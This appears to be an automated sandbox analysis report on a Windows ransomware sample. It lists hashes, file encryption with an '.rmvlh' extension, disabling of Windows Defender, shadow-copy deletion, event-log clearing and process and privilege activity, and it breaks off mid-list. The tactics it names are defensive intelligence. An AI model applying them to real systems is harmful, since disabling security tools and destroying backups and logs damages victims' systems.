Analysis
-
max time kernel
23s -
max time network
147s -
platform
windows10_x64 -
resource
win10-en-20211208 -
submitted
13-01-2022 09:48
Static task
static1
Behavioral task
behavioral1
Sample
9a047e0ffd51190cec150aec2c10bfcf546b75e4442d9280fb6fbfba28a7e083.exe
Resource
win7-en-20211208
Behavioral task
behavioral2
Sample
9a047e0ffd51190cec150aec2c10bfcf546b75e4442d9280fb6fbfba28a7e083.exe
Resource
win10-en-20211208
General
-
Target
9a047e0ffd51190cec150aec2c10bfcf546b75e4442d9280fb6fbfba28a7e083.exe
-
Size
2.8MB
-
MD5
4cd47497f204e06035a82dbf52b39fec
-
SHA1
bd07c57aead84fec6fac5eaa85d6ee5fb35bd4b8
-
SHA256
9a047e0ffd51190cec150aec2c10bfcf546b75e4442d9280fb6fbfba28a7e083
-
SHA512
f44a9c987946fcbfc19264915150ec150f65fe6aebf70cc3a48b38a4bb28d080cdd685290cae0462eb925dbede38b79c959fc45fb0486a136a2681461ab313f6
Malware Config
Signatures
-
Deletes Windows Defender Definitions 2 TTPs 1 IoCs
Uses mpcmdrun utility to delete all AV definitions.
pid Process 1828 MpCmdRun.exe -
Modifies security service 2 TTPs 1 IoCs
description ioc Process Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WinDefend\Start = "4" reg.exe -
Clears Windows event logs 1 TTPs
-
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs
pid Process 3036 bcdedit.exe 2416 bcdedit.exe -
Drops file in Program Files directory 64 IoCs
description ioc Process File opened for modification C:\Program Files\Common Files\System\ado\msado27.tlb 9a047e0ffd51190cec150aec2c10bfcf546b75e4442d9280fb6fbfba28a7e083.exe File opened for modification C:\Program Files\Common Files\System\ado\msado28.tlb 9a047e0ffd51190cec150aec2c10bfcf546b75e4442d9280fb6fbfba28a7e083.exe File opened for modification C:\Program Files\Internet Explorer\ja-JP\ieinstal.exe.mui 9a047e0ffd51190cec150aec2c10bfcf546b75e4442d9280fb6fbfba28a7e083.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\jre\lib\deploy.jar.5QPfJehcqfAm1fqfv8O-YZLy6Q61CA1Tax0YsY0ZlYz_62PWJabGlKk0.rmvlh 9a047e0ffd51190cec150aec2c10bfcf546b75e4442d9280fb6fbfba28a7e083.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\jre\lib\ext\jaccess.jar.5QPfJehcqfAm1fqfv8O-YZLy6Q61CA1Tax0YsY0ZlYz_NYmyxI9f-lg0.rmvlh 9a047e0ffd51190cec150aec2c10bfcf546b75e4442d9280fb6fbfba28a7e083.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\gifs\feedback.gif.5QPfJehcqfAm1fqfv8O-YZLy6Q61CA1Tax0YsY0ZlYz_Apslhrh9_yo0.rmvlh 9a047e0ffd51190cec150aec2c10bfcf546b75e4442d9280fb6fbfba28a7e083.exe File opened for modification C:\Program Files\Common Files\System\Ole DB\de-DE\sqloledb.rll.mui.5QPfJehcqfAm1fqfv8O-YZLy6Q61CA1Tax0YsY0ZlYz_sjY8Z5KNeJc0.rmvlh 9a047e0ffd51190cec150aec2c10bfcf546b75e4442d9280fb6fbfba28a7e083.exe File opened for modification C:\Program Files\Common Files\System\Ole DB\fr-FR\sqloledb.rll.mui.5QPfJehcqfAm1fqfv8O-YZLy6Q61CA1Tax0YsY0ZlYz_eYVF-PssGcA0.rmvlh 9a047e0ffd51190cec150aec2c10bfcf546b75e4442d9280fb6fbfba28a7e083.exe File opened for modification C:\Program Files\Common Files\microsoft shared\ink\fsdefinitions\main\zh-phonetic.xml 9a047e0ffd51190cec150aec2c10bfcf546b75e4442d9280fb6fbfba28a7e083.exe File opened for modification C:\Program Files\Common Files\microsoft shared\ink\lt-LT\tipresx.dll.mui 9a047e0ffd51190cec150aec2c10bfcf546b75e4442d9280fb6fbfba28a7e083.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.diagnostic_5.5.0.165303.jar.5QPfJehcqfAm1fqfv8O-YZLy6Q61CA1Tax0YsY0ZlYz_FftIVTnSA2A0.rmvlh 9a047e0ffd51190cec150aec2c10bfcf546b75e4442d9280fb6fbfba28a7e083.exe File opened for modification C:\Program Files\7-Zip\Lang\et.txt.5QPfJehcqfAm1fqfv8O-YZLy6Q61CA1Tax0YsY0ZlYz_WftgQ7Toq2M0.rmvlh 9a047e0ffd51190cec150aec2c10bfcf546b75e4442d9280fb6fbfba28a7e083.exe File opened for modification C:\Program Files\Common Files\System\Ole DB\es-ES\msdasqlr.dll.mui.5QPfJehcqfAm1fqfv8O-YZLy6Q61CA1Tax0YsY0ZlYz_hRwhJCaeb5A0.rmvlh 9a047e0ffd51190cec150aec2c10bfcf546b75e4442d9280fb6fbfba28a7e083.exe File opened for modification C:\Program Files\Common Files\microsoft shared\ink\nb-NO\tipresx.dll.mui 9a047e0ffd51190cec150aec2c10bfcf546b75e4442d9280fb6fbfba28a7e083.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\jre\lib\currency.data.5QPfJehcqfAm1fqfv8O-YZLy6Q61CA1Tax0YsY0ZlYz_YnBw2yGC-To0.rmvlh 9a047e0ffd51190cec150aec2c10bfcf546b75e4442d9280fb6fbfba28a7e083.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.core.net.nl_zh_4.4.0.v20140623020002.jar.5QPfJehcqfAm1fqfv8O-YZLy6Q61CA1Tax0YsY0ZlYz_hW_lsgcy8040.rmvlh 9a047e0ffd51190cec150aec2c10bfcf546b75e4442d9280fb6fbfba28a7e083.exe File opened for modification C:\Program Files\7-Zip\Lang\an.txt.5QPfJehcqfAm1fqfv8O-YZLy6Q61CA1Tax0YsY0ZlYz_eR6g71watGg0.rmvlh 9a047e0ffd51190cec150aec2c10bfcf546b75e4442d9280fb6fbfba28a7e083.exe File opened for modification C:\Program Files\7-Zip\Lang\sq.txt.5QPfJehcqfAm1fqfv8O-YZLy6Q61CA1Tax0YsY0ZlYz_jPbmHxM15cI0.rmvlh 9a047e0ffd51190cec150aec2c10bfcf546b75e4442d9280fb6fbfba28a7e083.exe File opened for modification C:\Program Files\Common Files\System\ado\msado60.tlb 9a047e0ffd51190cec150aec2c10bfcf546b75e4442d9280fb6fbfba28a7e083.exe File opened for modification C:\Program Files\Common Files\microsoft shared\Stationery\Roses.htm 9a047e0ffd51190cec150aec2c10bfcf546b75e4442d9280fb6fbfba28a7e083.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\db\lib\derbynet.jar.5QPfJehcqfAm1fqfv8O-YZLy6Q61CA1Tax0YsY0ZlYz_4j6zXfFgGCo0.rmvlh 9a047e0ffd51190cec150aec2c10bfcf546b75e4442d9280fb6fbfba28a7e083.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.console.historicaldata_5.5.0.165303.jar.5QPfJehcqfAm1fqfv8O-YZLy6Q61CA1Tax0YsY0ZlYz_Y0qg0unOXE00.rmvlh 9a047e0ffd51190cec150aec2c10bfcf546b75e4442d9280fb6fbfba28a7e083.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.flightrecorder.controlpanel.ui.ja_5.5.0.165303.jar.5QPfJehcqfAm1fqfv8O-YZLy6Q61CA1Tax0YsY0ZlYz_ykwczqnRDPU0.rmvlh 9a047e0ffd51190cec150aec2c10bfcf546b75e4442d9280fb6fbfba28a7e083.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.p2.extensionlocation.nl_zh_4.4.0.v20140623020002.jar.5QPfJehcqfAm1fqfv8O-YZLy6Q61CA1Tax0YsY0ZlYz_uBjFrMW_rCk0.rmvlh 9a047e0ffd51190cec150aec2c10bfcf546b75e4442d9280fb6fbfba28a7e083.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.simpleconfigurator.manipulator_2.0.0.v20131217-1203.jar.5QPfJehcqfAm1fqfv8O-YZLy6Q61CA1Tax0YsY0ZlYz_unmMxzl7_Yg0.rmvlh 9a047e0ffd51190cec150aec2c10bfcf546b75e4442d9280fb6fbfba28a7e083.exe File opened for modification C:\Program Files\7-Zip\7zCon.sfx.5QPfJehcqfAm1fqfv8O-YZLy6Q61CA1Tax0YsY0ZlYz_4mkQZaJ0bdU0.rmvlh 9a047e0ffd51190cec150aec2c10bfcf546b75e4442d9280fb6fbfba28a7e083.exe File opened for modification C:\Program Files\Common Files\microsoft shared\ink\ipssrb.xml 9a047e0ffd51190cec150aec2c10bfcf546b75e4442d9280fb6fbfba28a7e083.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\db\lib\derby.jar.5QPfJehcqfAm1fqfv8O-YZLy6Q61CA1Tax0YsY0ZlYz_gcXLDsfHeuk0.rmvlh 9a047e0ffd51190cec150aec2c10bfcf546b75e4442d9280fb6fbfba28a7e083.exe File opened for modification C:\Program Files\7-Zip\Lang\ro.txt.5QPfJehcqfAm1fqfv8O-YZLy6Q61CA1Tax0YsY0ZlYz_jtA-rVtXgDY0.rmvlh 9a047e0ffd51190cec150aec2c10bfcf546b75e4442d9280fb6fbfba28a7e083.exe File opened for modification C:\Program Files\Common Files\System\ado\de-DE\msader15.dll.mui.5QPfJehcqfAm1fqfv8O-YZLy6Q61CA1Tax0YsY0ZlYz_I4VqksVjAuM0.rmvlh 9a047e0ffd51190cec150aec2c10bfcf546b75e4442d9280fb6fbfba28a7e083.exe File opened for modification C:\Program Files\Internet Explorer\en-US\hmmapi.dll.mui 9a047e0ffd51190cec150aec2c10bfcf546b75e4442d9280fb6fbfba28a7e083.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\plugin.xml.5QPfJehcqfAm1fqfv8O-YZLy6Q61CA1Tax0YsY0ZlYz_MojFr8Px2KY0.rmvlh 9a047e0ffd51190cec150aec2c10bfcf546b75e4442d9280fb6fbfba28a7e083.exe File opened for modification C:\Program Files\7-Zip\Lang\sr-spl.txt.5QPfJehcqfAm1fqfv8O-YZLy6Q61CA1Tax0YsY0ZlYz_f5DELp-7WDA0.rmvlh 9a047e0ffd51190cec150aec2c10bfcf546b75e4442d9280fb6fbfba28a7e083.exe File opened for modification C:\Program Files\Common Files\System\Ole DB\de-DE\oledb32r.dll.mui 9a047e0ffd51190cec150aec2c10bfcf546b75e4442d9280fb6fbfba28a7e083.exe File opened for modification C:\Program Files\Common Files\microsoft shared\ink\es-ES\TipRes.dll.mui 9a047e0ffd51190cec150aec2c10bfcf546b75e4442d9280fb6fbfba28a7e083.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\ant-javafx.jar.5QPfJehcqfAm1fqfv8O-YZLy6Q61CA1Tax0YsY0ZlYz_TfdWUg_-QVM0.rmvlh 9a047e0ffd51190cec150aec2c10bfcf546b75e4442d9280fb6fbfba28a7e083.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.emf.common_2.10.1.v20140901-1043\META-INF\eclipse.inf.5QPfJehcqfAm1fqfv8O-YZLy6Q61CA1Tax0YsY0ZlYz_0DpSyFBvTQI0.rmvlh 9a047e0ffd51190cec150aec2c10bfcf546b75e4442d9280fb6fbfba28a7e083.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.core.databinding.beans.nl_ja_4.4.0.v20140623020002.jar.5QPfJehcqfAm1fqfv8O-YZLy6Q61CA1Tax0YsY0ZlYz_fYvXB4RS-fk0.rmvlh 9a047e0ffd51190cec150aec2c10bfcf546b75e4442d9280fb6fbfba28a7e083.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.security_1.2.0.v20130424-1801.jar.5QPfJehcqfAm1fqfv8O-YZLy6Q61CA1Tax0YsY0ZlYz_H3rcXbO1J1U0.rmvlh 9a047e0ffd51190cec150aec2c10bfcf546b75e4442d9280fb6fbfba28a7e083.exe File opened for modification C:\Program Files\Common Files\System\ado\msado21.tlb 9a047e0ffd51190cec150aec2c10bfcf546b75e4442d9280fb6fbfba28a7e083.exe File opened for modification C:\Program Files\Common Files\System\Ole DB\ja-JP\sqlxmlx.rll.mui.5QPfJehcqfAm1fqfv8O-YZLy6Q61CA1Tax0YsY0ZlYz_KO9y7OqPmLk0.rmvlh 9a047e0ffd51190cec150aec2c10bfcf546b75e4442d9280fb6fbfba28a7e083.exe File opened for modification C:\Program Files\Common Files\System\msadc\fr-FR\msdaprsr.dll.mui 9a047e0ffd51190cec150aec2c10bfcf546b75e4442d9280fb6fbfba28a7e083.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.rcp.application.ja_5.5.0.165303.jar.5QPfJehcqfAm1fqfv8O-YZLy6Q61CA1Tax0YsY0ZlYz_rT7wpN4jG-k0.rmvlh 9a047e0ffd51190cec150aec2c10bfcf546b75e4442d9280fb6fbfba28a7e083.exe File opened for modification C:\Program Files\Common Files\System\Ole DB\fr-FR\msdasqlr.dll.mui.5QPfJehcqfAm1fqfv8O-YZLy6Q61CA1Tax0YsY0ZlYz_41MPRQXwRsI0.rmvlh 9a047e0ffd51190cec150aec2c10bfcf546b75e4442d9280fb6fbfba28a7e083.exe File opened for modification C:\Program Files\Common Files\System\Ole DB\ja-JP\sqloledb.rll.mui.5QPfJehcqfAm1fqfv8O-YZLy6Q61CA1Tax0YsY0ZlYz_F-Q-mJ4MBuI0.rmvlh 9a047e0ffd51190cec150aec2c10bfcf546b75e4442d9280fb6fbfba28a7e083.exe File opened for modification C:\Program Files\Common Files\System\msadc\es-ES\msdaprsr.dll.mui.5QPfJehcqfAm1fqfv8O-YZLy6Q61CA1Tax0YsY0ZlYz__MLx__lZ5Zg0.rmvlh 9a047e0ffd51190cec150aec2c10bfcf546b75e4442d9280fb6fbfba28a7e083.exe File opened for modification C:\Program Files\Common Files\microsoft shared\ink\es-ES\rtscom.dll.mui 9a047e0ffd51190cec150aec2c10bfcf546b75e4442d9280fb6fbfba28a7e083.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\notification_plugin.jar.5QPfJehcqfAm1fqfv8O-YZLy6Q61CA1Tax0YsY0ZlYz_SNItfojPm0s0.rmvlh 9a047e0ffd51190cec150aec2c10bfcf546b75e4442d9280fb6fbfba28a7e083.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.core.net_1.2.200.v20140124-2013.jar.5QPfJehcqfAm1fqfv8O-YZLy6Q61CA1Tax0YsY0ZlYz_SBugtfJOhoc0.rmvlh 9a047e0ffd51190cec150aec2c10bfcf546b75e4442d9280fb6fbfba28a7e083.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.e4.core.contexts_1.3.100.v20140407-1019.jar.5QPfJehcqfAm1fqfv8O-YZLy6Q61CA1Tax0YsY0ZlYz_Jd-hXxat34Q0.rmvlh 9a047e0ffd51190cec150aec2c10bfcf546b75e4442d9280fb6fbfba28a7e083.exe File opened for modification C:\Program Files\Common Files\microsoft shared\ink\fsdefinitions\oskpred.xml 9a047e0ffd51190cec150aec2c10bfcf546b75e4442d9280fb6fbfba28a7e083.exe File opened for modification C:\Program Files\Common Files\microsoft shared\ink\ja-JP\ShapeCollector.exe.mui 9a047e0ffd51190cec150aec2c10bfcf546b75e4442d9280fb6fbfba28a7e083.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\jre\lib\deploy\messages_de.properties.5QPfJehcqfAm1fqfv8O-YZLy6Q61CA1Tax0YsY0ZlYz_HE8XNownmzQ0.rmvlh 9a047e0ffd51190cec150aec2c10bfcf546b75e4442d9280fb6fbfba28a7e083.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.core_5.5.0.165303.jar.5QPfJehcqfAm1fqfv8O-YZLy6Q61CA1Tax0YsY0ZlYz_DBJSiSh_Zj00.rmvlh 9a047e0ffd51190cec150aec2c10bfcf546b75e4442d9280fb6fbfba28a7e083.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.flightrecorder.ui.ja_5.5.0.165303.jar.5QPfJehcqfAm1fqfv8O-YZLy6Q61CA1Tax0YsY0ZlYz_xA3Wf3WZ0Cc0.rmvlh 9a047e0ffd51190cec150aec2c10bfcf546b75e4442d9280fb6fbfba28a7e083.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.launcher.win32.win32.x86_64.nl_ja_4.4.0.v20140623020002.jar.5QPfJehcqfAm1fqfv8O-YZLy6Q61CA1Tax0YsY0ZlYz_Lh91f3wcJzs0.rmvlh 9a047e0ffd51190cec150aec2c10bfcf546b75e4442d9280fb6fbfba28a7e083.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.p2.artifact.repository.nl_zh_4.4.0.v20140623020002.jar.5QPfJehcqfAm1fqfv8O-YZLy6Q61CA1Tax0YsY0ZlYz_vlMgWWpxoig0.rmvlh 9a047e0ffd51190cec150aec2c10bfcf546b75e4442d9280fb6fbfba28a7e083.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\jre\lib\deploy\messages_es.properties.5QPfJehcqfAm1fqfv8O-YZLy6Q61CA1Tax0YsY0ZlYz_vfWpm8dVIrY0.rmvlh 9a047e0ffd51190cec150aec2c10bfcf546b75e4442d9280fb6fbfba28a7e083.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\gifs\prodicon.gif.5QPfJehcqfAm1fqfv8O-YZLy6Q61CA1Tax0YsY0ZlYz_aknHU87gUMA0.rmvlh 9a047e0ffd51190cec150aec2c10bfcf546b75e4442d9280fb6fbfba28a7e083.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\icons\alert_obj.png.5QPfJehcqfAm1fqfv8O-YZLy6Q61CA1Tax0YsY0ZlYz_wbBCODoCiIM0.rmvlh 9a047e0ffd51190cec150aec2c10bfcf546b75e4442d9280fb6fbfba28a7e083.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.babel.nls_eclipse_ja_4.4.0.v20140623020002\about.html.5QPfJehcqfAm1fqfv8O-YZLy6Q61CA1Tax0YsY0ZlYz_a7ZtRLX6kII0.rmvlh 9a047e0ffd51190cec150aec2c10bfcf546b75e4442d9280fb6fbfba28a7e083.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.zh_CN_5.5.0.165303.jar.5QPfJehcqfAm1fqfv8O-YZLy6Q61CA1Tax0YsY0ZlYz_3jGrDWtw85g0.rmvlh 9a047e0ffd51190cec150aec2c10bfcf546b75e4442d9280fb6fbfba28a7e083.exe File opened for modification C:\Program Files\Common Files\System\msadc\es-ES\msadcor.dll.mui.5QPfJehcqfAm1fqfv8O-YZLy6Q61CA1Tax0YsY0ZlYz_aZ-5-eaxD7E0.rmvlh 9a047e0ffd51190cec150aec2c10bfcf546b75e4442d9280fb6fbfba28a7e083.exe File opened for modification C:\Program Files\Common Files\microsoft shared\ink\fsdefinitions\symbols\ja-jp-sym.xml 9a047e0ffd51190cec150aec2c10bfcf546b75e4442d9280fb6fbfba28a7e083.exe -
Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
-
Interacts with shadow copies 2 TTPs 1 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
pid Process 1428 vssadmin.exe -
Modifies registry class 3 IoCs
description ioc Process Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\*\shellex\ContextMenuHandlers\EPP reg.exe Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\Directory\shellex\ContextMenuHandlers\EPP reg.exe Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\Drive\shellex\ContextMenuHandlers\EPP reg.exe -
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 8 IoCs
pid Process 4064 powershell.exe 4064 powershell.exe 4064 powershell.exe 3516 powershell.exe 3516 powershell.exe 3516 powershell.exe 4092 9a047e0ffd51190cec150aec2c10bfcf546b75e4442d9280fb6fbfba28a7e083.exe 4092 9a047e0ffd51190cec150aec2c10bfcf546b75e4442d9280fb6fbfba28a7e083.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeSecurityPrivilege 644 wevtutil.exe Token: SeBackupPrivilege 644 wevtutil.exe Token: SeSecurityPrivilege 3784 wevtutil.exe Token: SeBackupPrivilege 3784 wevtutil.exe Token: SeSecurityPrivilege 3564 wevtutil.exe Token: SeBackupPrivilege 3564 wevtutil.exe Token: SeIncreaseQuotaPrivilege 496 wmic.exe Token: SeSecurityPrivilege 496 wmic.exe Token: SeTakeOwnershipPrivilege 496 wmic.exe Token: SeLoadDriverPrivilege 496 wmic.exe Token: SeSystemProfilePrivilege 496 wmic.exe Token: SeSystemtimePrivilege 496 wmic.exe Token: SeProfSingleProcessPrivilege 496 wmic.exe Token: SeIncBasePriorityPrivilege 496 wmic.exe Token: SeCreatePagefilePrivilege 496 wmic.exe Token: SeBackupPrivilege 496 wmic.exe Token: SeRestorePrivilege 496 wmic.exe Token: SeShutdownPrivilege 496 wmic.exe Token: SeDebugPrivilege 496 wmic.exe Token: SeSystemEnvironmentPrivilege 496 wmic.exe Token: SeRemoteShutdownPrivilege 496 wmic.exe Token: SeUndockPrivilege 496 wmic.exe Token: SeManageVolumePrivilege 496 wmic.exe Token: 33 496 wmic.exe Token: 34 496 wmic.exe Token: 35 496 wmic.exe Token: 36 496 wmic.exe Token: SeIncreaseQuotaPrivilege 1748 wmic.exe Token: SeSecurityPrivilege 1748 wmic.exe Token: SeTakeOwnershipPrivilege 1748 wmic.exe Token: SeLoadDriverPrivilege 1748 wmic.exe Token: SeSystemProfilePrivilege 1748 wmic.exe Token: SeSystemtimePrivilege 1748 wmic.exe Token: SeProfSingleProcessPrivilege 1748 wmic.exe Token: SeIncBasePriorityPrivilege 1748 wmic.exe Token: SeCreatePagefilePrivilege 1748 wmic.exe Token: SeBackupPrivilege 1748 wmic.exe Token: SeRestorePrivilege 1748 wmic.exe Token: SeShutdownPrivilege 1748 wmic.exe Token: SeDebugPrivilege 1748 wmic.exe Token: SeSystemEnvironmentPrivilege 1748 wmic.exe Token: SeRemoteShutdownPrivilege 1748 wmic.exe Token: SeUndockPrivilege 1748 wmic.exe Token: SeManageVolumePrivilege 1748 wmic.exe Token: 33 1748 wmic.exe Token: 34 1748 wmic.exe Token: 35 1748 wmic.exe Token: 36 1748 wmic.exe Token: SeIncreaseQuotaPrivilege 1748 wmic.exe Token: SeSecurityPrivilege 1748 wmic.exe Token: SeTakeOwnershipPrivilege 1748 wmic.exe Token: SeLoadDriverPrivilege 1748 wmic.exe Token: SeSystemProfilePrivilege 1748 wmic.exe Token: SeSystemtimePrivilege 1748 wmic.exe Token: SeProfSingleProcessPrivilege 1748 wmic.exe Token: SeIncBasePriorityPrivilege 1748 wmic.exe Token: SeCreatePagefilePrivilege 1748 wmic.exe Token: SeBackupPrivilege 1748 wmic.exe Token: SeRestorePrivilege 1748 wmic.exe Token: SeShutdownPrivilege 1748 wmic.exe Token: SeDebugPrivilege 1748 wmic.exe Token: SeSystemEnvironmentPrivilege 1748 wmic.exe Token: SeRemoteShutdownPrivilege 1748 wmic.exe Token: SeUndockPrivilege 1748 wmic.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 4092 wrote to memory of 480 4092 9a047e0ffd51190cec150aec2c10bfcf546b75e4442d9280fb6fbfba28a7e083.exe 70 PID 4092 wrote to memory of 480 4092 9a047e0ffd51190cec150aec2c10bfcf546b75e4442d9280fb6fbfba28a7e083.exe 70 PID 480 wrote to memory of 1176 480 net.exe 72 PID 480 wrote to memory of 1176 480 net.exe 72 PID 4092 wrote to memory of 2324 4092 9a047e0ffd51190cec150aec2c10bfcf546b75e4442d9280fb6fbfba28a7e083.exe 73 PID 4092 wrote to memory of 2324 4092 9a047e0ffd51190cec150aec2c10bfcf546b75e4442d9280fb6fbfba28a7e083.exe 73 PID 2324 wrote to memory of 636 2324 net.exe 75 PID 2324 wrote to memory of 636 2324 net.exe 75 PID 4092 wrote to memory of 908 4092 9a047e0ffd51190cec150aec2c10bfcf546b75e4442d9280fb6fbfba28a7e083.exe 76 PID 4092 wrote to memory of 908 4092 9a047e0ffd51190cec150aec2c10bfcf546b75e4442d9280fb6fbfba28a7e083.exe 76 PID 908 wrote to memory of 3672 908 net.exe 78 PID 908 wrote to memory of 3672 908 net.exe 78 PID 4092 wrote to memory of 1812 4092 9a047e0ffd51190cec150aec2c10bfcf546b75e4442d9280fb6fbfba28a7e083.exe 79 PID 4092 wrote to memory of 1812 4092 9a047e0ffd51190cec150aec2c10bfcf546b75e4442d9280fb6fbfba28a7e083.exe 79 PID 1812 wrote to memory of 3976 1812 net.exe 81 PID 1812 wrote to memory of 3976 1812 net.exe 81 PID 4092 wrote to memory of 2244 4092 9a047e0ffd51190cec150aec2c10bfcf546b75e4442d9280fb6fbfba28a7e083.exe 82 PID 4092 wrote to memory of 2244 4092 9a047e0ffd51190cec150aec2c10bfcf546b75e4442d9280fb6fbfba28a7e083.exe 82 PID 2244 wrote to memory of 1776 2244 net.exe 84 PID 2244 wrote to memory of 1776 2244 net.exe 84 PID 4092 wrote to memory of 1760 4092 9a047e0ffd51190cec150aec2c10bfcf546b75e4442d9280fb6fbfba28a7e083.exe 85 PID 4092 wrote to memory of 1760 4092 9a047e0ffd51190cec150aec2c10bfcf546b75e4442d9280fb6fbfba28a7e083.exe 85 PID 1760 wrote to memory of 856 1760 net.exe 87 PID 1760 wrote to memory of 856 1760 net.exe 87 PID 4092 wrote to memory of 600 4092 9a047e0ffd51190cec150aec2c10bfcf546b75e4442d9280fb6fbfba28a7e083.exe 88 PID 4092 wrote to memory of 600 4092 9a047e0ffd51190cec150aec2c10bfcf546b75e4442d9280fb6fbfba28a7e083.exe 88 PID 600 wrote to memory of 2672 600 net.exe 90 PID 600 wrote to memory of 2672 600 net.exe 90 PID 4092 wrote to memory of 1248 4092 9a047e0ffd51190cec150aec2c10bfcf546b75e4442d9280fb6fbfba28a7e083.exe 91 PID 4092 wrote to memory of 1248 4092 9a047e0ffd51190cec150aec2c10bfcf546b75e4442d9280fb6fbfba28a7e083.exe 91 PID 1248 wrote to memory of 4012 1248 net.exe 93 PID 1248 wrote to memory of 4012 1248 net.exe 93 PID 4092 wrote to memory of 1196 4092 9a047e0ffd51190cec150aec2c10bfcf546b75e4442d9280fb6fbfba28a7e083.exe 94 PID 4092 wrote to memory of 1196 4092 9a047e0ffd51190cec150aec2c10bfcf546b75e4442d9280fb6fbfba28a7e083.exe 94 PID 1196 wrote to memory of 2416 1196 net.exe 96 PID 1196 wrote to memory of 2416 1196 net.exe 96 PID 4092 wrote to memory of 3992 4092 9a047e0ffd51190cec150aec2c10bfcf546b75e4442d9280fb6fbfba28a7e083.exe 97 PID 4092 wrote to memory of 3992 4092 9a047e0ffd51190cec150aec2c10bfcf546b75e4442d9280fb6fbfba28a7e083.exe 97 PID 4092 wrote to memory of 1140 4092 9a047e0ffd51190cec150aec2c10bfcf546b75e4442d9280fb6fbfba28a7e083.exe 99 PID 4092 wrote to memory of 1140 4092 9a047e0ffd51190cec150aec2c10bfcf546b75e4442d9280fb6fbfba28a7e083.exe 99 PID 4092 wrote to memory of 1480 4092 9a047e0ffd51190cec150aec2c10bfcf546b75e4442d9280fb6fbfba28a7e083.exe 101 PID 4092 wrote to memory of 1480 4092 9a047e0ffd51190cec150aec2c10bfcf546b75e4442d9280fb6fbfba28a7e083.exe 101 PID 4092 wrote to memory of 1520 4092 9a047e0ffd51190cec150aec2c10bfcf546b75e4442d9280fb6fbfba28a7e083.exe 103 PID 4092 wrote to memory of 1520 4092 9a047e0ffd51190cec150aec2c10bfcf546b75e4442d9280fb6fbfba28a7e083.exe 103 PID 4092 wrote to memory of 1840 4092 9a047e0ffd51190cec150aec2c10bfcf546b75e4442d9280fb6fbfba28a7e083.exe 105 PID 4092 wrote to memory of 1840 4092 9a047e0ffd51190cec150aec2c10bfcf546b75e4442d9280fb6fbfba28a7e083.exe 105 PID 4092 wrote to memory of 3984 4092 9a047e0ffd51190cec150aec2c10bfcf546b75e4442d9280fb6fbfba28a7e083.exe 107 PID 4092 wrote to memory of 3984 4092 9a047e0ffd51190cec150aec2c10bfcf546b75e4442d9280fb6fbfba28a7e083.exe 107 PID 4092 wrote to memory of 2308 4092 9a047e0ffd51190cec150aec2c10bfcf546b75e4442d9280fb6fbfba28a7e083.exe 109 PID 4092 wrote to memory of 2308 4092 9a047e0ffd51190cec150aec2c10bfcf546b75e4442d9280fb6fbfba28a7e083.exe 109 PID 4092 wrote to memory of 3960 4092 9a047e0ffd51190cec150aec2c10bfcf546b75e4442d9280fb6fbfba28a7e083.exe 111 PID 4092 wrote to memory of 3960 4092 